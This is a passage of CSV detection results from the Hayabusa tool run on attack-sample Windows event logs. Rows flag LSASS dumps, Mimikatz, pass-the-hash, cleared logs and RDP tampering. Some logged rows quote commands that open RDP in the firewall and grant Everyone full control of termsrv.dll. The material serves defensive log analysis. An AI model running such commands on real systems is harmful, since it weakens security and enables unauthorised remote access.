,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 
+09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive 
Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: 
""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: 
user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: 
RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
